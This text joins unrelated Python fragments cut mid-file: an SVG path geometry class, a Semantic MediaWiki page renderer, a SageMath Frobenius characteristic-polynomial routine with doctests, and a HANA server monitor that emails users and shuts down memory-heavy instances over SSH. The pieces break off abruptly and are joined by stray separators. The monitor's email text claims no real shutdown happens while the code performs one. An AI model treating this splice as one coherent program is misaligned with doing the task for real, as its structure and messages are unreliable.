return cmd.start_pos.tolist() <= cmd.end_pos.tolist()
det_total = 0.
for cmd in self.path_commands:
det_total += geom.det(cmd.start_pos, cmd.end_pos)
return det_total >= 0.
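# Worked example (as comments, assuming geom.det(a, b) is the 2D cross product a.x*b.y - a.y*b.x):
# for a path traversed (0,0) -> (1,0) -> (1,1) -> (0,1) -> (0,0) the per-segment
# determinants are 0, 1, 1, 0, so det_total = 2 >= 0 and the path is reported as
# clockwise (in SVG's y-down coordinate system).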
def set_orientation(self, orientation):
"""
orientation: 1 (clockwise), 0 (counter-clockwise)
"""
if orientation == self.is_clockwise():
return self
return self.reverse()
def set_closed(self, closed=True):
self.closed = closed
return self
def reverse(self):
path_commands = []
for command in reversed(self.path_commands):
path_commands.append(command.reverse())
self.path_commands = path_commands
return self
def reverse_non_closed(self):
if not self.start_pos.isclose(self.end_pos):
return self.reverse()
return self
def simplify_arcs(self):
path_commands = []
for command in self.path_commands:
if isinstance(command, SVGCommandArc):
if command.radius.iszero():
continue
if command.start_pos.isclose(command.end_pos):
continue
path_commands.extend(command.to_beziers())
else:
path_commands.append(command)
self.path_commands = path_commands
return self
def _get_topleftmost_command(self):
topleftmost_cmd = None
topleftmost_idx = 0
for i, cmd in enumerate(self.path_commands):
if topleftmost_cmd is None or cmd.is_left_to(topleftmost_cmd):
topleftmost_cmd = cmd
topleftmost_idx = i
return topleftmost_cmd, topleftmost_idx
def reorder(self):
if self.closed:
topleftmost_cmd, topleftmost_idx = self._get_topleftmost_command()
self.path_commands = [
*self.path_commands[topleftmost_idx:],
*self.path_commands[:topleftmost_idx]
]
return self
def to_video(self, wrapper, clips=None, svg_commands=None, color="grey"):
from .svg import SVG
from .svg_primitive import SVGLine, SVGCircle
if clips is None:
clips = []
if svg_commands is None:
svg_commands = []
svg_dots, svg_moves = [], []
for command in self.all_commands():
start_pos, end_pos = command.start_pos, command.end_pos
if isinstance(command, SVGCommandMove):
move = SVGLine(start_pos, end_pos, color="teal", dasharray=0.5)
svg_moves.append(move)
dot = SVGCircle(end_pos, radius=Radius(0.1), color="red")
svg_dots.append(dot)
svg_path = SVGPath(svg_commands).to_group(color=color)
svg_new_path = SVGPath([SVGCommandMove(start_pos), command]).to_group(color="red")
svg_paths = [svg_path, svg_new_path] if svg_commands else [svg_new_path]
im = SVG([*svg_paths, *svg_moves, *svg_dots]).draw(do_display=False, return_png=True, with_points=False)
clips.append(wrapper(np.array(im)))
svg_dots[-1].color = "grey"
svg_commands.append(command)
svg_moves = []
return clips, svg_commands
def numericalize(self, n=256):
for command in self.all_commands():
command.numericalize(n)
def smooth(self):
# https://github.com/paperjs/paper.js/blob/c7d85b663edb728ec78fffa9f828435eaf78d9c9/src/path/Path.js#L1288
n = len(self.path_commands)
knots = [self.start_pos, *(path_command.end_pos for path_command in self.path_commands)]
r = [knots[0] + 2 * knots[1]]
f = [2]
p = [Point(0.)] * (n + 1)
# Solve with the Thomas algorithm
for i in range(1, n):
internal = i < n - 1
a = 1
b = 4 if internal else 2
u = 4 if internal else 3
v = 2 if internal else 0
m = a / f[i-1]
f.append(b-m)
r.append(u * knots[i] + v * knots[i + 1] - m * r[i-1])
p[n-1] = r[n-1] / f[n-1]
for i in range(n-2, -1, -1):
p[i] = (r[i] - p[i+1]) / f[i]
p[n] = (3 * knots[n] - p[n-1]) / 2
for i in range(n):
p1, p2 = knots[i], knots[i+1]
c1, c2 = p[i], 2 * p2 - p[i+1]
self.path_commands[i] = SVGCommandBezier(p1, c1, c2, p2)
return self
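# Note (added for clarity): the loop above solves the standard cubic-spline smoothing
# system from paper.js. The first control points p[i] satisfy the tridiagonal system
#   p[i-1] + 4*p[i] + p[i+1] = 4*K[i] + 2*K[i+1]   (interior knots K),
# with special first/last rows, solved by the Thomas algorithm (forward sweep building
# f and r, then back substitution); the second control points follow as 2*K[i+1] - p[i+1].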
def simplify_heuristic(self):
return self.copy().split(max_dist=2, include_lines=False) \
.simplify(tolerance=0.1, epsilon=0.2, angle_threshold=150) \
.split(max_dist=7.5)
def simplify(self, tolerance=0.1, epsilon=0.1, angle_threshold=179., force_smooth=False):
# https://github.com/paperjs/paper.js/blob/c044b698c6b224c10a7747664b2a4cd00a416a25/src/path/PathFitter.js#L44
points = [self.start_pos, *(path_command.end_pos for path_command in self.path_commands)]
def subdivide_indices():
segments_list = []
current_segment = []
prev_command = None
for i, command in enumerate(self.path_commands):
if isinstance(command, SVGCommandLine):
if current_segment:
segments_list.append(current_segment)
current_segment = []
prev_command = None
continue
if prev_command is not None and prev_command.angle(command) < angle_threshold:
if current_segment:
segments_list.append(current_segment)
current_segment = []
current_segment.append(i)
prev_command = command
if current_segment:
segments_list.append(current_segment)
return segments_list
path_commands = []
def computeMaxError(first, last, curve: SVGCommandBezier, u):
maxDist = 0.
index = (last - first + 1) // 2
for i in range(1, last - first):
dist = curve.eval(u[i]).dist(points[first + i]) ** 2
if dist >= maxDist:
maxDist = dist
index = first + i
return maxDist, index
def chordLengthParametrize(first, last):
u = [0.]
for i in range(1, last - first + 1):
u.append(u[i-1] + points[first + i].dist(points[first + i-1]))
for i, _ in enumerate(u[1:], 1):
u[i] /= u[-1]
return u
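# Worked example (as comments): chordLengthParametrize assigns each point a parameter
# proportional to the accumulated chord length, e.g. three points with consecutive
# distances 3 and 1 give u = [0.0, 0.75, 1.0].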
def | |
# filename: wikifile/smw.py
'''
Created on 2021-03-07
@author: wf
'''
from __future__ import annotations
from typing import TYPE_CHECKING
from tabulate import tabulate
from wikifile.utils import Widget, Itemize, PageLink, WikiSon, SubObject, TemplateParam, SetProperties, SwitchFunction, \
MagicWord
if TYPE_CHECKING:
from wikifile.wikiRender import WikiRender
from wikifile.metamodel import Topic, Property, UML, Context
class SMWPart(object):
'''
a technical Semantic MediaWiki Part
'''
def __init__(self, part, wikiRender=None):
'''
Constructor
'''
self.part = part
self.wikiRender = wikiRender
self.template = "%s_page.jinja" % part.lower().replace(" ", "_")
def render_page(self, topic: Topic):
"""
Renders the wiki page of this SMW part for the given topic
Args:
topic: topic for which the page should be rendered
Returns:
the rendered wiki page as string
"""
template_template = self.wikiRender.template_env.get_template(self.template)
page = template_template.render(topic=topic)
return page
@staticmethod
def getAll(wikiRender: WikiRender):
smwPartList = [
ListOf(wikiRender),
SMWPart("Help"),
SMWPart("Category"),
SMWPart("Concept"),
Form(wikiRender),
Template(wikiRender),
#TODO: implement
#SMWPart("Properties"),
#SMWPart("PythonCode")
]
smwParts = {}
for smwPart in smwPartList:
smwPart.wikiRender = wikiRender
smwParts[smwPart.part] = smwPart
return smwParts
def get_page_name(self, topic: Topic):
return f"{self.part}:{topic.name}"
@staticmethod
def getAllAsPageLink(topic: Topic):
"""Returns all technical pages of the given topic as link list (also known as the see also section)"""
return SMW.render_as_list([f"[[:{smwPart.get_page_name(topic)}]]" for smwPart in SMWPart.getAll(None).values()])
class SMW:
"""Provides functions covering basic SMW features"""
@staticmethod
def parser_function(function_name: str, presence_is_true=False, **kwargs):
"""
Renders the given parameters and function name to the corresponding SMW parser function.
Parameter names containing a whitespace must be written with an underscore instead.
Args:
function_name: name of the function
presence_is_true: If true only the name of bool parameters is displayed. Otherwise the bool value is printed out.
**kwargs: parameters of the parser function
Returns:
the rendered parser function call as wikitext string
"""
return "{{#" + function_name + ":" + SMW.render_parameters(presence_is_true=presence_is_true, **kwargs)[1:] + "}}"
@staticmethod
def render_entity(template: str, oneliner=True, **kwargs):
"""
Renders the given parameters as template of the given name.
Args:
template: name of the template
oneliner: If True the entity is returned as a one-liner. Otherwise the entity is rendered in a prettier multi-line format.
**kwargs: parameters of the template
Returns:
Example:
Args:
template="Event"
oneliner= False
kwargs= 'Title'='SMWCon', 'Year'='2020'
Returns:
{{Event
|Title= SMWCon
|Year= 2020
}}
"""
separator = "" if oneliner else "\n"
return "{{" + template + separator + SMW.render_parameters(oneliner=oneliner, **kwargs) + "}}"
@staticmethod
def render_sample_entity_with_properties(topic: Topic, properties: list, oneliner=True):
"""
Args:
topic: Topic for which the sample entity template should be generated
properties: properties of the topic
oneliner: If true the result will be in one line. Otherwise, result string is returned in a prettier format.
Returns:
Example:
Args:
template="Event"
properties= [<Title property>, <Year property>]
oneliner= False
Returns:
{{Event
|Title= Some Title
|Year= Some Year
}}
"""
property_dict = {}
for property in properties:
property_dict = {**property_dict, property.name: f"Some {property.label}"}
return SMW.render_entity(topic.name, oneliner=oneliner, **property_dict)
@staticmethod
def render_parameters(oneliner=True, presence_is_true=False, **kwargs):
"""
Args:
oneliner: If true parameters are rendered in one line.
presence_is_true: If true only the name of bool parameters is displayed. Otherwise the bool value is printed out.
**kwargs: All parameters with their values. If a parameter contains whitespace, escape it with an underscore.
Returns:
Returns the given parameters as rendered mediawiki template parameters
"""
separator = "" if oneliner else "\n"
res = ""
for parameter, value in kwargs.items():
if isinstance(value, bool):
label = parameter.replace("_", " ")
if presence_is_true:
if value:
res += f"|{label}{separator}"
else:
# ToDo: Update bool values if decided how to query wiki config
bool_value = "true" if value else "false"
res += f"|{label}={bool_value}{separator}"
elif value is not None:
label = parameter.replace("_", " ")
res += f"|{label}={value}{separator}"
return res
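# Minimal usage sketch (as comments):
#   SMW.render_parameters(Title="SMWCon", Year=2020)             -> '|Title=SMWCon|Year=2020'
#   SMW.render_parameters(presence_is_true=True, is_hidden=True) -> '|is hidden'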
@staticmethod
def set_entity_parameter(topic, properties, oneliner=True, withDescription=False):
"""
Args:
topic: topic for which the properties should be set
properties: properties which should be stored
oneliner: If true the result will be in one line. Otherwise, result string is returned in a prettier format.
Returns:
the {{#set:...}} parser function call that stores the given properties
"""
property_dict = {"isA": topic.name}
for property in properties:
property_dict = {**property_dict, property.get_pageTitle(withNamespace=False): "{{{" + property.name + "|}}}"}
return SMW.parser_function("set", oneliner=oneliner, **property_dict)
@staticmethod
def render_as_list(data: list, is_ordered=False, prefix=""):
"""
Renders the given data as mediawiki list. If a value in the data is also a list a sublist entry is generated.
Args:
data: data that should be rendered as list. Can also contain lists.
is_ordered: If true an ordered list is returned based on the order in the given data. Otherwise, unordered list is returned.
prefix: string that is placed before each list item
Returns:
the rendered mediawiki list as string
"""
symbol = prefix
symbol += "#" if is_ordered else "*"
res = ""
for d in data:
if isinstance(d, list):
res += SMW.render_as_list(d, is_ordered, symbol)
else:
res += f"{symbol}{d}\n"
return res
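# Minimal usage sketch (as comments): nested lists become sub-lists.
#   SMW.render_as_list(["a", ["b", "c"], "d"])
#   -> '*a\n**b\n**c\n*d\n'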
class TemplatePage(Widget):
"""
Renders the Template page of a given Topic
"""
def __init__(self, topic:Topic):
self.topic=topic
self.template="<noinclude>\n{templatePage}\n</noinclude><includeonly>\n{templateRender}\n</includeonly>"
@property
def viewmodes(self) -> dict:
viewmodes = {
"queryTable": Query(mainlabel="-").select(
f"-Has subobject::{MagicWord('PAGENAME')}").printout_list_of_properties(self.topic.properties).render(),
"hidden": "",
"masterdetail": None, # fallthrough
"#default": Template.table_of_arguments(self.topic, self.topic.properties, escape=True)
}
return viewmodes
@property
def storemodes(self) -> dict:
templateParamMapping=self.topic.templateParamMapping
properties={templateParamMapping[prop.name] if prop.name in templateParamMapping else prop.name:prop for prop in self.topic.properties}
topicProperties = {prop.get_pageTitle(withNamespace=False): TemplateParam(name) for name, prop in properties.items()}
storemodes = {
"subobject": SubObject("-", **topicProperties, isA=self.topic.name),
"property": None, # fallthrough
"#default": SetProperties(**topicProperties) # default
}
return storemodes
def render(self):
topicPropertySamples={prop.get_pageTitle(withNamespace=False):"some value" for prop in self.topic.properties}
template=f"""<noinclude>
This is the template {PageLink(Template.get_page_name(self.topic))}.
== See also ==
{ Itemize([PageLink(smwPart.get_page_name(self.topic)) for smwPart in SMWPart.getAll(None).values()]) }
== Usage ==
<pre>
{ WikiSon(self.topic.name, topicPropertySamples) }
</pre>
{ WikiSon(self.topic.name, topicPropertySamples) }
[[Category:Template]]
</noinclude><includeonly>
{ SwitchFunction(TemplateParam('storemode', defaultValue='property'), **self.storemodes)}
{ SwitchFunction(TemplateParam('viewmode'), **self.viewmodes)}
[[Category:{ self.topic.name }]]
</includeonly>
"""
return template
class Template(SMWPart):
"""
Provides methods to generate a Template page for a topic
"""
def __init__(self, wikiRender=None):
if wikiRender is not None:
wikiRender.template_env.globals['Template'] = self
super().__init__("Template", wikiRender)
@staticmethod
def get_page_name(topic: Topic):
return f"Template:{topic.name}"
@staticmethod
def template_arg(arg):
return "{{{" + arg + "|}}}"
@staticmethod
def table_of_arguments(topic:Topic, properties:list=None, clickable_links:bool=True, setProperties:bool=False, escape:bool=False):
"""
Generate a media wiki table for each property of the topic and display their values
Args:
topic(Topic): Topic for which the table should be generated
properties(list): List of properties to display in the table. If None all properties of the given topic are used
clickable_links(bool): If True the property names will link to the Property page
setProperties(bool): If True the properties will be set for the entity.
escape(bool): If True the returned table will have an escaped pipe char
Returns:
string of a mediawiki table displaying the properties of the given topic
"""
formlink = Form.formlink(form=topic.name, link_text="✎", target="{{FULLPAGENAME}}", tooltip="Start editing this " + topic.name)
sortBySortPos = lambda property: 99999 if "sortPos" not in property.__dict__ or property.__dict__.get("sortPos") is None else int(property.sortPos)
properties_sorted = sorted(properties, key=sortBySortPos)
table=Table(css_class="wikitable", escape=escape)
tableHeader=f"{formlink} {topic.get_page_link()}"
table.add_row().add_cell(colspan=2,is_header=True, content=tableHeader)
for property in properties_sorted:
row=table.add_row()
label = property.get_description_page_link() if clickable_links else property.label
row.add_cell(is_header=True, style="text-align:left", content=label)
if setProperties: # set the property for the entity
value=f"[[{property.get_pageTitle(withNamespace=False)}::{'{{{'} {property.name}|{'}}}'}]]"
else: # just display the raw value
value=Template.template_arg(property.name)
row.add_cell(content=f"{'{{'}#if:{Template.template_arg(property.name)}|{value}|{'}}'}")
return table.render()
class ListOf(SMWPart):
"""
Provides methods to generate a List of page for a topic
"""
def __init__(self, wikiRender=None):
super().__init__("List of", wikiRender)
@staticmethod
def get_page_name(topic: Topic):
return f"List of {topic.pluralName}"
class Form(SMWPart):
"""
Provides methods to render a complete Form or parts of a Form.
For more details see: https://www.mediawiki.org/wiki/Extension:Page_Forms
"""
regexps = {
'Regexp:NaturalNumber': {
'regexp': "/^[0-9]+$!^$/",
'message': 'Must be a Number',
'or char': '!'
}
}
def __init__(self, wikiRender=None):
if wikiRender is not None:
wikiRender.template_env.globals['Form'] = self
super().__init__("Form", wikiRender)
#self.template = "event_form.jinja"
@staticmethod
def get_page_name(topic: Topic):
return f"Form:{topic.name}"
@staticmethod
def page_form_function(tag, **kwargs):
"""
Renders a Page Forms tag of the given type with the given parameters.
Args:
tag: Type of the form function. e.g.: field, form, info, ...
**kwargs: parameters of the form function
Returns:
the rendered page form tag as string, e.g. {{{field|...}}}
"""
return "{{{" + tag + SMW.render_parameters(presence_is_true=True, **kwargs) + "}}}"
@staticmethod
def standard_input_tag(input, oneliner=True, **kwargs):
"""
Renders standard input tag
For more detail see: https://www.mediawiki.org/wiki/Extension:Page_Forms/Defining_forms#'standard_input'_tag
Args:
input: If a list, the standard input tag is generated for each item in the list with the given parameters. Otherwise, the standard input tag is generated for the given input
oneliner: If True the result will be one string line. Otherwise, multiple standard input tags will result in multiple lines.
**kwargs: parameters of the standard input tag. If the parameter contains whitespace escape it with underscore.
Returns:
the rendered standard input tag(s) as string
"""
if isinstance(input, list):
res = ""
for tag in input:
res += Form.standard_input_tag(tag, oneliner, **kwargs)
return res
| |
r"""
Computation of the Frobenius polynomial using Newton's identities
"""
# *****************************************************************************
# Copyright (C) 2018 <NAME> <<EMAIL>>
# Distributed under the terms of the GNU General Public License (GPL)
# https://www.gnu.org/licenses/
# *****************************************************************************
from __future__ import division
from sage.rings.integer_ring import ZZ
from sage.functions.log import log
def charpoly_frobenius(frob_matrix, charpoly_prec, p, weight, a=1, known_factor=[1]):
"""
Return the characteristic polynomial of the given Frobenius matrix.
INPUT:
- ``frob_matrix`` -- a matrix representing the Frobenius matrix up to some precision
- ``charpoly_prec`` -- a vector `a_i`, such that `frob_matrix.change_ring(ZZ).charpoly()[i]`
will be correct mod `p^(a_i)`; this can easily be deduced from the Hodge numbers and
the `q`-adic precision of ``frob_matrix``
- ``p`` -- prime `p`
- ``weight`` -- weight of the motive
- ``a`` -- `q = p^a`
- ``known_factor`` -- the list of coefficients of the known factor
OUTPUT:
A list of integers corresponding to the characteristic polynomial of the Frobenius action
EXAMPLES::
sage: from sage.schemes.cyclic_covers.charpoly_frobenius import charpoly_frobenius
sage: M = Matrix([[O(17), 8 + O(17)], [O(17), 15 + O(17)]])
sage: charpoly_frobenius(M, [2, 1, 1], 17, 1, 1)
[17, 2, 1]
sage: R = Zq(17**2 , names=('a',))
sage: M = Matrix(R, [[8*17 + 16*17**2 + O(17**3), 8 + 11*17 + O(17**2)], [7*17**2 + O(17**3), 15 + 8*17 + O(17**2)]])
sage: charpoly_frobenius(M*M, [3, 2, 2], 17, 1, 2)
[289, 30, 1]
sage: M = Matrix([[8*31 + 8*31**2 + O(31**3), O(31**3), O(31**3), O(31**3)], [O(31**3), 23*31 + 22*31**2 + O(31**3), O(31**3), O(31**3)], [O(31**3), O(31**3), 27 + 7*31 + O(31**3), O(31**3)], [O(31**3), O(31**3), O(31**3), 4 + 23*31 + O(31**3)]])
sage: charpoly_frobenius(M, [4, 3, 2, 2, 2], 31, 1, 1)
[961, 0, 46, 0, 1]
sage: M = Matrix([(4*43^2 + O(43^3), 17*43 + 11*43^2 + O(43^3), O(43^3), O(43^3), 17 + 37*43 + O(43^3), O(43^3)),
....: (30*43 + 23*43^2 + O(43^3), 5*43 + O(43^3), O(43^3), O(43^3), 3 + 38*43 + O(43^3), O(43^3)),
....: (O(43^3), O(43^3), 9*43 + 32*43^2 + O(43^3), 13 + 25*43 + O(43^3), O(43^3), 17 + 18*43 + O(43^3)),
....: (O(43^3), O(43^3), 22*43 + 25*43^2 + O(43^3), 11 + 24*43 + O(43^3), O(43^3), 36 + 5*43 + O(43^3)),
....: (42*43 + 15*43^2 + O(43^3), 22*43 + 8*43^2 + O(43^3), O(43^3), O(43^3), 29 + 4*43 + O(43^3), O(43^3)),
....: (O(43^3), O(43^3), 6*43 + 19*43^2 + O(43^3), 8 + 24*43 + O(43^3), O(43^3), 31 + 42*43 + O(43^3))])
sage: charpoly_frobenius(M, [5, 4, 3, 2, 2, 2, 2], 43, 1, 1)
[79507, 27735, 6579, 1258, 153, 15, 1]
sage: M = Matrix([(1 + O(4999), O(4999), 0, 0),
....: (O(4999), 4860 + O(4999), 0, 0),
....: (0, 0, O(4999), O(4999)),
....: (0, 0, O(4999), 1 + O(4999))])
sage: charpoly_frobenius(M, [2, 1, 1], 4999, 1, 1, [1, -2 ,1 ])
[4999, 139, 1]
TESTS::
sage: M = Matrix([[-149196156000219, 0, 0, 0, 0, 0, 0, 0],
....: [0, 76324364094257, 0, 0, 0, 0, 0, 0],
....: [0, 0, 76324364094257, 0, 0, 0, 0, 0],
....: [0, 0, 0, -149196156000219, 0, 0, 0, 0],
....: [0, 0, 0, 0, 281855171388275, 0, 0, 0],
....: [0, 0, 0, 0, 0, -208983379482579, 0, 0],
....: [0, 0, 0, 0, 0, 0, -208983379482579, 0],
....: [0, 0, 0, 0, 0, 0, 0, 281855171388275]])
sage: charpoly_frobenius(M, [9, 8, 7, 6, 5, 5, 5, 5, 5], 1009, 1, 2)
[1074309286591662654798721,
561382189105547134612,
-2982540407204025062,
-247015136050256,
4390163797795,
-242628176,
-2877542,
532,
1]
sage: M = Matrix([[0, 0, 0, -338082603, 0, 0, 0, 0],
....: [0, 0, -317436968, 0, 0, 0, 0, 0],
....: [0, -120741807, 0, 0, 0, 0, 0, 0],
....: [200618482, 0, 0, 0, 0, 0, 0, 0],
....: [0, 0, 0, 0, 0, 0, 0, 123492519],
....: [0, 0, 0, 0, 0, 0, 426826171, 0],
....: [0, 0, 0, 0, 0, 157417117, 0, 0],
....: [0, 0, 0, 0, 373415235, 0, 0, 0]])
sage: charpoly_frobenius(M, [7, 6, 5, 4, 3, 3, 3, 3, 3], 1009, 1, 1)
[1036488922561, 0, 270809546, 0, -1474149, 0, 266, 0, 1]
sage: M = Matrix({(0, 31): 1814236329200021268558465351501717,
....: (1, 30): 3268331092352160631300311212049390,
....: (2, 29): 1002349136486054751305109007707560,
....: (3, 28): 1789497403160078628636360424523308,
....: (4, 19): 919866278512654133838788268427125,
....: (5, 18): 2918980842679879118243999587726673,
....: (6, 17): 2062741569795231121341967954037400,
....: (7, 16): 3562554496811633214919332352788305,
....: (8, 7): 287823825201170974551150606916601,
....: (9, 6): 2657175570144838727074228404244845,
....: (10, 5): 3200631048273888400670606576807785,
....: (11, 4): 707085630754978281870563133348521,
....: (12, 39): 679572779843478608532167180287595,
....: (13, 38): 510867456922807824071915371084390,
....: (14, 37): 3300741705093235469798877501619286,
....: (15, 36): 1374430202827161695034370373469332,
....: (16, 27): 1897240889699239396313755822318254,
....: (17, 26): 3171751877741319729745976757727266,
....: (18, 25): 1151779650995750952707414056498421,
....: (19, 24): 1309748952162524211332312241346156,
....: (20, 15): 2914640274871541651939754878647777,
....: (21, 14): 2524322227034087814555116576604052,
....: (22, 13): 693999428630644346611319813759997,
....: (23, 12): 2093267437436875555592094407087011,
....: (24, 3): 101158112439244133585487537448909,
....: (25, 2): 638873050956374173808321501215560,
....: (26, 1): 3529335795023815426485172749287314,
....: (27, 0): 618726320422582798159865537548600,
....: (28, 35): 2510605595766272594980682702750921,
....: (29, 34): 2978146199632282120435531158312695,
....: (30, 33): 1724161588290366191539756998844438,
....: (31, 32): 516507426627993787229114955328811,
....: (32, 23): 1716672265998537901154333190869011,
....: (33, 22): 3787144776814278856737374038432424,
....: (34, 21): 3765560528316833596614887925578722,
....: (35, 20): 1628311006615824767735977131865996,
....: (36, 11): 3638935478569769465046956942756848,
....: (37, 10): 1878821491042105813643148323053706,
....: (38, 9): 1187568624951630613061547491748348,
....: (39, 8): 2538351040819233009959661983810741}
....: )
sage: charpoly_frobenius(M,
....: [31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16,
....: 15, 14, 13, 12] + [11]*21, 1129, 1, 1)
[11320844849639649951608809973589776933203136765026963553258401,
0,
0,
0,
0,
0,
0,
0,
0,
0,
24687045654725446027864774006541463602997309796,
0,
0,
0,
0,
0,
0,
0,
0,
0,
20187877911930897108199045855206,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7337188909826596,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1]
sage: F = Matrix(Qp(17),
....: [(28442601332527957763, 729848492961404015, 70994086070709920),
....: (24928804992606688137, 1345506389644311177, 147442915782003034),
....: (7562462964206075698, 1262441299395996535, 92309755559576133)])
sage: F+= F.base_ring()(0).add_bigoh(6)*ones_matrix(*F.dimensions())
sage: charpoly_frobenius(F, [6, 5, 4, 4], 17, 2)
[-4913, -221, 13, 1]
"""
assert known_factor[-1] == 1
try:
cp = frob_matrix.change_ring(ZZ).charpoly().list()
except ValueError:
# the given matrix wasn't integral
cp = frob_matrix.charpoly().change_ring(ZZ).list()
assert len(charpoly_prec) == len(cp) - (len(known_factor) - 1)
assert cp[-1] == 1
# reduce cp mod prec
degree = len(charpoly_prec) - 1
mod = [0] * (degree + 1)
for i in range(len(charpoly_prec)):
mod[-i] = p**charpoly_prec[-i]
cp[-i] = cp[-i] % mod[-i]
# figure out the sign
# i.e., if it is a reciprocal or an antireciprocal polynomial
if weight % 2 == 1:
# for odd weight the sign is always 1
# it's the charpoly of a USp matrix
# and charpoly of a symplectic matrix is reciprocal
sign = 1
else:
# For the moment I will not worry about this case
if known_factor != [1]:
raise NotImplementedError()
# we compare ith coefficient and (degree - i)th coefficient to deduce the sign
# note, if degree is even, the middle coefficient will not help us determine the sign
for i in range((degree + 1)//2):
# Note: degree*weight is even
p_power = p**min(
charpoly_prec[i],
charpoly_prec[degree - i] + ((a * (degree - 2 * i) * weight) // 2),
)
if cp[i] % p_power != 0 and cp[degree - i] % p_power != 0:
other = cp[degree - i] * p**((a * (degree - 2 * i) * weight) // 2)
if (cp[i] + other) % p_power == 0:
sign = -1
else:
sign = 1
assert (-sign * cp[i] + other) % p_power == 0
break
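# Note (added for clarity): the sign encodes the functional equation of the Frobenius
# polynomial: with q = p^a and degree d, the coefficients satisfy
#   cp[i] = sign * q^(weight*(d - 2*i)/2) * cp[d - i],
# i.e. the polynomial is reciprocal (sign = +1) or antireciprocal (sign = -1) up to
# scaling of the variable; odd weight forces sign = +1.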
# halfdegree is the number of coefficients that we will compute
# the rest will be deduced using the functional equation
# as up to scaling of the variable
# the polynomial is either reciprocal or antireciprocal polynomial
# note, this includes the middle coefficient if degree is even
halfdegree = degree // 2 + 1
cp[0] = sign * p**((a * degree * weight) // 2) # Note: degree*weight is even
# calculate the i-th power sum of the roots and correct cp along the way
e = cp[-halfdegree:]
e.reverse()
for k in range(halfdegree):
if k % 2 != 0:
e[k] = -e[k] % mod[degree - k]
# e[k] = cp[degree - k] if (k%2 ==0) else -cp[degree - k]
if k > 0:
# verify if p^charpoly_prec[degree - k] > 2*degree/k * q^(w*k/2)
assert (
log(k) / log(p) + charpoly_prec[degree | |
{2} is consuming highest "
"({3}%) memory.".format(sid, server_name, user_name, mem_usage),
location_id)
self._monitor.get_os_operator().shutdown_hana(ssh, os)
Mu.log_info(self.__logger,
"HANA:{0} on {1} shutdown is processed.".format(sid, server_name),
location_id)
if email is not None and len(email) > 0:
# sending email to the owner of the instance
email_to = [email]
email_body = ("Dear {0}, \n\n{1} is running out of memory, your {2} is "
"shutting down because it's consuming highest memory. "
"If this SID is very important and you do not want "
"it to be shut down next time, please contact administrator"
" to mark it as an important SID. \n -- this is only a testing email "
"your hana will not be shut down really, please do it manually."
"\n\nRegards,\nHANA OS "
"Monitor".format(employee_name, server_name, sid))
Mu.log_debug(self.__logger, "[MEM] Sending email to:{0} for "
"shutting down HANA.".format(email_to), location_id)
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
email_to,
"[MONITOR.MEM] {0} on {1} is Shutting Down".format(sid, server_name),
email_body,
self._monitor.get_db_operator().get_email_admin(location_id))
else:
Mu.log_info(self.__logger,
"HANA:{0} on {1} shutdown is processed, "
"but no email configured.".format(sid, server_name),
location_id)
finally:
self._monitor.get_os_operator().close_ssh_connection(ssh)
def __get_highest_memory_consumer(self, top5_mem_consumers, server_id, location_id):
# get the consumer which consuming highest memory, skip the important server
# highest_consumer = max(top5_mem_consumers, key=lambda x: x["USAGE"])
if not top5_mem_consumers:
return None
for i in range(0, len(top5_mem_consumers)):
sid = Mu.get_sid_from_sidadm(top5_mem_consumers[i]["USER_NAME"])
if self._monitor.get_db_operator().is_important_server(sid, server_id):
Mu.log_debug(self.__logger,
"skip the important SID:{0} in server (id):{1}".format(sid, server_id),
location_id)
continue
return top5_mem_consumers[i]
def __check_disk_notify(self, server_info, location_id):
"""check the disk for the provided server.
If current disk is less than the predefined threshold, will send the warning email to the top 5
disk consumers.
"""
server_id = server_info[Mc.FIELD_SERVER_ID]
server_name = server_info[Mc.FIELD_SERVER_FULL_NAME]
disk_free = server_info[Mc.FIELD_DISK_FREE]
disk_total = server_info[Mc.FIELD_DISK_TOTAL]
free_disk_threshold = ((100 - Mc.get_db_disk_usage_warn_threshold(self._monitor.get_db_operator(),
self.__logger)) * disk_total) / 100
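# Worked example (illustrative numbers only): with a configured warn threshold of 90%
# and disk_total = 500 GB, free_disk_threshold = (100 - 90) * 500 / 100 = 50 GB, so the
# warning below is triggered once less than 50 GB of disk space is free.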
Mu.log_debug(self.__logger,
"Server:{0}, free disk:{1}, threshold:{2}".format(server_name, disk_free, free_disk_threshold),
location_id)
if disk_free is not None and disk_free < free_disk_threshold:
# sending warning email to top 5 disk consumers
top5_disk_consumers = self._monitor.get_db_operator().get_top5_disk_consumers(server_id)
Mu.log_debug(self.__logger,
"Server ({0}), top 5 disk consumers:{1}".format(server_name, top5_disk_consumers),
location_id)
# If it's not working time, skip following part (Sending email)
if not Mu.is_current_time_working_time():
Mu.log_info(self.__logger, "Skip sending email because of the non-working time.")
return
email_to = [consumer["EMAIL"] for consumer in top5_disk_consumers if consumer["EMAIL"] is not None]
Mu.log_debug(self.__logger, "[DISK] Sending email to:{0}".format(email_to), location_id)
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
email_to,
"[MONITOR.DISK] {0} is Running Out of Disk".format(server_name),
Mu.generate_email_body(server_info, Mc.SERVER_INFO_DISK, top5_disk_consumers),
self._monitor.get_db_operator().get_email_admin(location_id))
def __check_monitoring_status_and_email(self, check_id, location_id):
"""check whether there are some servers which all the three stages monitoring process are failed,
and send mail to administrators to warn this."""
servers = self._monitor.get_db_operator().get_failed_servers(check_id, location_id)
if not servers:
return
# If it's not working time, skip following part (Sending email)
if not Mu.is_current_time_working_time():
Mu.log_info(self.__logger, "Skip sending email for failed server(s) {0} "
"because of the non-working time.".format(servers))
return
subject = "[MONITOR.TASKS] failed on {0} servers".format(len(servers)) \
if len(servers) > 1 else "[MONITOR.TASKS] failed on 1 server"
body = "Monitoring process failed on:"
for server in servers:
body = "".join([body, "\n\t", server])
body = "".join([body,
"\n",
"Normally the monitoring process failed because of the connection not working, "
"please have a check with the relative connection(s)."])
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
self._monitor.get_db_operator().get_email_admin(location_id),
subject,
body)
def __check_cpu_notify(self, server_info, location_id):
"""check the cpu for the provided server.
If current cpu utilization is higher than the predefined threshold, will send the warning email to the top 5
cpu consumers.
"""
server_id = server_info[Mc.FIELD_SERVER_ID]
server_name = server_info[Mc.FIELD_SERVER_FULL_NAME]
cpu_usage = server_info[Mc.FIELD_CPU_UTILIZATION]
